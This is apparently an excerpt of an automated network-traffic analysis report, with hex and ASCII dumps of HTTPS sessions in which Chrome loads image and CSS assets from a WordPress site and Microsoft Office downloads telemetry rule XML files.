                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 6c e2 eb d7 52 6b 50 be 49 8d 7d d6 d3 a3 69 b0 89 96 57 d7 d2 b7 a7 fe 40 2d 1b ab b6 61 db dd 83 7f 7d f2 7c a7 73 71 82 54 23 36 fa 47 5d aa b6 d2 ee c1 15 d5 71 b5 c6 a5 13 f4 e9 41 ec e8 df 20 9d 36 9d 64 e2 ff 9a 82 a4 dc 31 f6 1b c1 19 c5 d5 42 01 5a 0f 06 d6 5e 49 e5 7c 74 35 9f e3 a4 9a 03 60 b6 25 35 1a a7 51 ef 4e 36 68 de 2f ab 46 9a 5e 80 4f 00 fd 89 a6 2d 44 36 e8 10 ea 1c 5f e5 c6 59 49 ea ad 1a 49 dc d7 f7 d0 98 21 24 8e 1d 62 c9 70 0e c0 18 53 ce ba ea 47 35 e5 2a 51 bd 84 d6 84 58 6d 32 db bc 70 a5 92 83 8c 4f ad c5 a8 65 0b 41 3a 5d 10 a1 a4 b4 9e 4c ba de ff 62 bb 16 14 83 8f 6e bd 6a 4b 89 66 a1 df f0 51 c9 21 32 5f c1 56 5a 1e e6 a0 92 3a bc 08 98 5a 48 d2 48 90 c6 5f 93 60 28 e7 f7 f9 f5 ed 32 51 56 7c 79 b1 fd da 83 dd d3 11 9e 6e
                                                                                                                      Data Ascii: lRkPI}iW@-a}|sqT#6G]qA 6d1BZ^I|t5`%5QN6h/F^O-D6_YII!$bpSG5*QXm2pOeA:]LbnjKfQ!2_VZ:ZHH_`(2QV|yn
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 26 14 cb c1 7b b5 3e d1 c8 d4 75 4d a1 ca cc 97 64 1b fc 09 28 0b aa 70 a1 2a 50 d2 74 99 17 6c fe ed 74 ec 06 fb 7e 2a fb 8d 0c b6 64 5a 16 2f 18 94 8e dd 5a f6 b6 0c 82 3f 75 42 c1 ec a4 96 96 ba 94 f5 83 4a 71 76 98 e6 e7 07 1f 5e c1 7e 1b cf 37 f1 7c 1c 36 43 31 65 9a 3a 40 01 f1 64 de dc 68 68 89 c2 4b 3e 26 19 82 93 8c d8 99 8a 80 41 f4 a2 27 e0 57 12 82 d2 a8 8c 81 82 bc c0 5e e6 f1 c4 c7 59 8f 48 dd 1d 56 7c d5 f5 6a b9 7c d7 68 b1 98 77 be ca ac b6 03 83 cc f5 a0 09 3d 56 95 a5 01 7d 5e b5 4d a9 6b aa 80 10 d3 35 3f 7d 7d f3 d9 d5 cd 07 cf 5f dd dc 14 f3 0c 9f dc ee 3f 8e c3 0f 3f 7e fe b5 df fa d2 77 7e f9 3b df ff 97 bf fd dd ff f0 1f bc ff 87 bf e7 31 3d de 9c 0f c3 70 c0 78 75 35 8f cf de 39 7b f6 f6 2f fd fa f7 7e e9 bb df 7d f2 f8 f2 cf 7f
                                                                                                                      Data Ascii: &{>uMd(p*Ptlt~*dZ/Z?uBJqv^~7|6C1e:@dhhK>&A'W^YHV|j|hw=V}^Mk5?}}_??~w~;1=pxu59{/~}
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: bf b7 fb e0 38 49 17 9d bd 38 d9 7c f3 e1 61 d2 76 f3 e5 83 4b 3b db b3 85 db ae e6 c2 d6 e6 13 3b 5b 13 55 bb 2c 5b a3 24 9b 7b 77 57 f2 aa ae d3 59 b6 ac 9b bb b3 fa e0 f0 78 7b a8 37 86 e9 e2 a8 d9 9e 0c 6e ee cd 5c a5 fc d4 ce 70 7f 5e e5 a9 86 71 77 d3 64 43 f0 43 4e c1 da 06 25 16 b1 33 9a 67 0c 17 78 ea f2 25 d2 e0 b3 2a d4 a6 64 be 41 73 89 d0 a8 b6 96 4f 7a eb d1 7a 60 a4 dc ef ed 05 78 00 f5 6f 08 81 4b 30 3f ff b8 dc 4a ca 48 e8 59 da bc f4 06 51 76 d6 63 38 c1 c2 39 25 de 9b ac 93 93 ce 54 a2 b7 d2 ca 52 31 86 59 10 f5 41 bf 29 4a b0 f1 1d d3 94 34 ba 59 68 fa 51 c3 45 a9 c4 02 37 56 c6 bf 84 53 a3 53 c0 88 ec 9e 66 52 2d 7f 48 0f f9 a2 c3 d5 d0 f0 c6 8a 2a 3c c0 fc a1 f3 04 73 07 77 06 07 d9 24 db 27 3b 84 46 5b b0 3e 60 99 2f 97 80 b5 a8 bf
                                                                                                                      Data Ascii: 8I8|avK;;[U,[${wWYx{7n\p^qwdCCN%3gx%*dAsOzz`xoK0?JHYQvc89%TR1YA)J4YhQE7VSSfR-H*<sw$';F[>`/
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 5c 01 91 5b c6 c7 3f f4 dc 1b ef dd fe d3 d7 6f b8 67 e6 52 62 40 52 b8 93 b7 ae 5d a0 76 fb 71 6b 63 74 fd ea 15 55 d5 8b a3 c3 ba aa dd 96 2e 33 b5 51 66 03 9d 94 da b8 08 ec 62 f4 60 90 e7 d0 2c 4d 5d 6d bc 35 1a 76 18 00 6b 93 9c 2c ea 59 d3 fe d8 df ff 6f b6 1e bf 0a b2 4c 56 a6 e7 3e 4f 80 9a 15 30 05 1d bb dd c3 25 bf f2 da 7b 6f de 78 af a9 56 a9 f5 e8 55 5f 7c 41 98 45 23 7b ab ba 96 0a c2 e5 bc 79 e3 f6 31 96 62 1d 1d 97 cb d5 72 31 5f 8d c6 e5 e6 a8 24 8c 39 b2 9b d4 da a4 24 0c 93 4e 0b c8 8b 3f 48 d4 85 54 a2 02 f2 08 5d bb f7 53 02 41 59 ab 1e 67 3d 0d 1a ed 9a 29 b9 86 a5 79 e0 b8 d1 1d de a4 79 d5 4c dc e1 08 2e a3 8c 65 d0 51 17 9a 6d 1b b1 69 c9 cd 1a 19 2c d1 c2 4b c9 f1 b4 8f 8e 8a d2 66 eb 6d 89 79 aa 1c b2 01 43 ca d0 30 61 c0 db d6
                                                                                                                      Data Ascii: \[?ogRb@R]vqkctU.3Qfb`,M]m5vk,YoLV>O0%{oxVU_|AE#{y1br1_$9$N?HT]SAYg=)yyL.eQmi,KfmyC0a
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 19 d3 85 c0 0c 42 82 50 83 da 37 eb 22 98 ba 64 1d 1a e7 a8 8c 21 21 cd 1c 76 fb 82 4f f9 da 9d 87 bf f4 95 57 db d6 70 d9 64 70 40 91 a5 74 58 ba a5 e6 ae 74 e5 72 be ba be 7d f7 d6 cb 5f fc 9c 29 07 9f f8 d4 f7 9f bb 7a fd f0 e1 fd 72 bc 51 0c 5c 72 bd b3 b1 31 de d9 d9 04 95 0e 60 c3 a4 54 66 bb c3 2d 2f 07 6e 93 67 38 e2 3e 3e 3e d9 db dd 7b fb b5 d7 3e f6 c9 3f 33 1c 14 cb e5 fc e5 af 7e b5 9a ce 94 80 ab 95 84 3c 6a ab 40 87 19 14 8f 32 86 e1 75 1d cd 4b c0 4b 01 c5 cf 93 ae a5 66 75 62 5a e8 6f 11 e3 2d 21 da a7 77 9b 13 1c 14 31 db 29 ec b3 8a 9b 77 1f 8c bc cf c5 e1 27 76 17 50 12 53 54 d4 59 88 7c 13 24 2f 55 eb c0 87 fe 26 e6 ff 07 b9 79 57 14 b9 0a ea b9 4b 5b e7 26 e5 ad 7b c6 95 16 8d e1 67 e2 3e b2 d6 22 d4 d2 ef e8 92 ee 44 aa 04 43 ad 45
                                                                                                                      Data Ascii: BP7"d!!vOWpdp@tXtr}_)zrQ\r1`Tf-/ng8>>>{>?3~<j@2uKKfubZo-!w1)w'vPSTY|$/U&yWK[&{g>"DCE
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: db d5 09 44 7c 63 4f 22 5c b9 e4 c9 86 97 0b aa 6b 38 1e b0 56 6c 89 51 46 7a 60 52 fb 0f a2 42 cd c8 b0 16 e7 b6 7a 07 1c 8a fd 0c c4 fe 2a 99 cb 90 a1 ca e8 e5 e4 f8 e8 f1 d3 e9 98 8d 06 f7 e4 6d 09 ea 57 6b 71 9d be 38 fd e0 c9 d2 67 4e 42 f4 83 75 e0 c3 4b 92 6f f0 f3 1e 15 6a e6 28 c7 15 73 28 6f 63 42 47 18 4e 02 3c c3 a9 73 6b 8b 66 d9 31 bb 66 df 3e 2b b6 91 e4 ae a7 40 26 7a 6e 26 7e dd 23 a8 0f 11 d5 c6 6e 99 a1 93 21 e8 45 d5 78 27 c0 1e f6 6b d3 58 1c b1 18 bf 75 5c 30 9b f1 12 18 8c 96 c7 4c 58 13 7d d4 f5 ce c5 80 82 42 03 8d f6 7c b1 c6 6d 7c f4 9a b8 fb 35 71 f5 0b a3 8f fe 72 31 9b 0f 32 58 97 ae d5 b6 a6 c2 d5 35 16 87 9c 34 a0 b6 f1 a3 08 f9 92 fe bd 62 a2 0b f7 f5 3e 7e 3a fb df ff ea 67 03 a5 0f c6 07 57 ae bd 96 4c 76 13 5b 49 db c0
                                                                                                                      Data Ascii: D|cO"\k8VlQFz`RBz*mWkq8gNBuKoj(s(ocBGN<skf1f>+@&zn&~#n!Ex'kXu\0LX}B|m|5qr12X54b>~:gWLv[I
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 42 d2 98 e7 90 06 43 64 16 36 4f 36 49 da 28 72 34 84 55 0a 15 5a 55 50 e7 96 d5 b0 38 23 91 b4 d4 15 5b 52 f6 54 fe 98 81 e4 85 ca f0 be a9 54 6b 9c 60 0d 33 77 63 02 c9 f5 e8 e8 0b 77 ee dc b9 99 25 c9 f9 e9 c5 83 c7 4f 2f 16 eb 06 5b 44 e8 99 31 c8 b3 db 57 f7 af 1f 1d fd f9 fb 9f b1 a9 82 0b 18 f7 ae 39 24 e5 25 39 9a ce ad da 92 24 06 8e 37 1c 53 fc c8 ea 4b 79 c0 93 f2 21 0d 8f 25 d7 53 2e 65 dd 0c cc 8b 86 24 bb c5 7e 5f de e9 17 3b d0 52 c1 09 ea 9c 8b 22 4e 24 be 05 57 28 c9 86 23 82 a5 42 2d 82 ea 0e e5 a6 1c 8f 47 49 92 1c 3f 7e 48 d8 ad c4 d4 a5 88 16 7e 5e 96 c9 f9 21 b0 37 a4 c5 77 25 79 7a 11 1a d7 24 36 24 a3 c0 08 cb da 04 b9 65 06 7e f8 b9 b1 34 6e 6b a7 49 17 01 0f fd b1 dc 25 31 51 77 59 06 a4 4f 95 90 31 cd 71 11 a6 e5 b6 98 a0 62 1b
                                                                                                                      Data Ascii: BCd6O6I(r4UZUP8#[RTTk`3wcw%O/[D1W9$%9$7SKy!%S.e$~_;R"N$W(#B-GI?~H~^!7w%yz$6$e~4nkI%1QwYO1qb
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: a1 f4 53 31 55 23 70 d5 08 15 27 c8 ee d2 c0 96 00 27 ea 6f be f7 47 67 e7 a7 88 30 0d 1c 46 d6 1b 86 d8 8b 20 08 eb d1 49 2d dc 1b 96 01 20 03 54 ec e5 60 ed a3 4c 38 a9 61 17 0f 06 03 e9 7a 6c 41 9f 51 5f da 4b fd 24 3f e6 10 a8 f6 e4 a8 bb 41 3d 07 0d 75 36 fc 75 9e 16 ad 84 37 99 94 7e e6 1f 3c e5 1c d3 b3 95 f7 6a 74 7e 60 2f 7b 98 9c cb 9a 7a 1d 81 7f 9b 8a 18 33 87 2c 4d 63 0f 22 8e 9d 99 64 a3 22 49 23 0c d5 82 96 6e b0 50 44 71 44 45 36 bd 2e dc 4b 3a 03 85 ad d8 19 57 f3 a0 48 b3 b0 be d0 ca 45 94 33 a9 22 a8 c0 69 c3 cc 57 a1 4a 9c e2 c1 93 e9 35 92 78 84 cd 69 2f 46 4f 6a 85 3b e6 78 93 2c 70 12 ba 0d d2 2b a0 06 fd 15 9f 90 b0 fa 26 84 29 82 c3 63 c7 27 49 06 43 3e b4 14 b7 3b 3a db 8d d0 49 60 38 8e 8d 34 71 1b c4 36 09 49 4b 73 68 6e 86 41
                                                                                                                      Data Ascii: S1U#p''oGg0F I- T`L8azlAQ_K$?A=u6u7~<jt~`/{z3,Mc"d"I#nPDqDE6.K:WHE3"iWJ5xi/FOj;x,p+&)c'IC>;:I`84q6IKshnA


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      125192.168.2.449889196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:25 UTC384OUTGET /wp-content/uploads/2018/02/logo-COLOUR.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:26 UTC261INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:09 GMT
                                                                                                                      ETag: "33ff-56723b56eb140"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 13311
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:26 UTC7931INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 d0 00 00 01 7f 08 06 00 00 00 60 f5 fe 3a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 33 a1 49 44 41 54 78 da ec dd 4f 6c 23 69 7a 1f e0 9a 9d d9 8d bd bb de 91 ed d8 58 c7 b0 87 0b e4 9f 3d 08 46 7d c8 c9 80 9a 4a 90 c3 04 30 46 3a e5 12 60 28 1f f6 38 23 dd 74 8a d4 39 f5 4d ea 39 fa 10 71 6e 39 45 da 43 30 47 b1 1b d8 4b 8c a0 35 08 06 b1 01 db cb 31 e2 c0 81 d7 5e cd 7a d7 de b5 77 77 52 1f ab 28 b1 d5 22 ab 48 56 91 f5 e7 79 00 8e a6 bb 29 b2 f8 55 51 fc d5 a7 b7 de 2f 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a e9 cd f7 3e 7a 1e df 36 8c 44 7b 7d c1 10 00 00 cc 65 33 be
                                                                                                                      Data Ascii: PNGIHDR`:tEXtSoftwareAdobe ImageReadyqe<3IDATxOl#izX=F}J0F:`(8#t9M9qn9EC0GK51^zwwR("HVy)UQ/>z6D{}e3
                                                                                                                      2024-12-03 07:55:26 UTC5380INData Raw: 58 f8 87 fc 3c 67 ef e7 ea a1 0b 15 66 f5 67 8d e7 c5 94 5e dc 1f 66 3c ee 86 19 2d a8 c4 cf d7 fe 5c 21 9a 65 84 71 1e 1a 06 04 68 56 f9 43 3e ef d9 7b c7 0f f9 42 65 5d f0 f7 68 c6 87 72 d6 07 c5 91 e1 85 5a 85 e8 4d a5 72 8b 53 0f 8d 00 4d d5 cf de d5 43 17 21 7b e1 94 71 eb ba 69 b2 66 a1 3b 5a da 41 a5 42 74 3f c7 3d 8f fc 96 6f a9 10 1d 2e de 3c 30 12 02 34 ac f2 07 fc 3c 67 ef ea a1 97 97 b7 75 dd 34 fd 02 9e 03 58 9d 10 ec 86 19 f7 09 e1 d9 04 c5 72 21 fa 34 e7 cf 47 04 68 28 2c 44 cf 73 f6 ae 1e 7a 51 d9 0b a7 dc b6 ae 9b be af c2 07 71 56 d9 cd 8e 96 76 50 99 9f af 61 92 22 4f 29 c7 fb 7e b6 ae e4 64 05 01 1a 0a fd 21 7f 1a e5 af 87 3e 37 60 0b c9 aa 7d 7e 92 f3 71 f2 dc cf 2c 34 54 e7 e7 eb 20 ca ee a2 13 c2 73 cf 60 2d 2e d4 43 c7 37 01 5a 80
                                                                                                                      Data Ascii: X<gfg^f<-\!eqhVC>{Be]hrZMrSMC!{qif;ZABt?=o.<04<gu4Xr!4Gh(,DszQqVvPa"O)~d!>7`}~q,4T s`-.C7Z


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      126192.168.2.44988313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:25 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:25 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 427
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                      x-ms-request-id: 8aad1780-e01e-0020-7ed6-43de90000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075525Z-174f7845968cpnpfhC1EWR3afc00000015700000000076u0
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      127192.168.2.44988713.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:25 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:25 UTC491INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 419
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                      x-ms-request-id: 774b57f8-e01e-001f-60f8-441633000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075525Z-174f7845968nxc96hC1EWRspw8000000159g00000000a0rw
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      128192.168.2.44989013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:26 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:26 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:26 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 472
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                      x-ms-request-id: 910f2ee4-d01e-00a1-4df4-4435b1000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075526Z-174f78459684bddphC1EWRbht400000015d0000000003hxp
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      129192.168.2.44989113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:27 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:27 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:27 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 405
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                      x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075527Z-174f7845968swgbqhC1EWRmnb400000015t0000000005pzy
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:27 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      130192.168.2.449893196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:27 UTC628OUTGET /wp-content/plugins/js_composer_salient/assets/lib/bower/animate-css/animate.min.css?ver=6.9.1 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:28 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:27 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:28:16 GMT
                                                                                                                      ETag: "caa8-5eed4f517ac00"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 51880
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
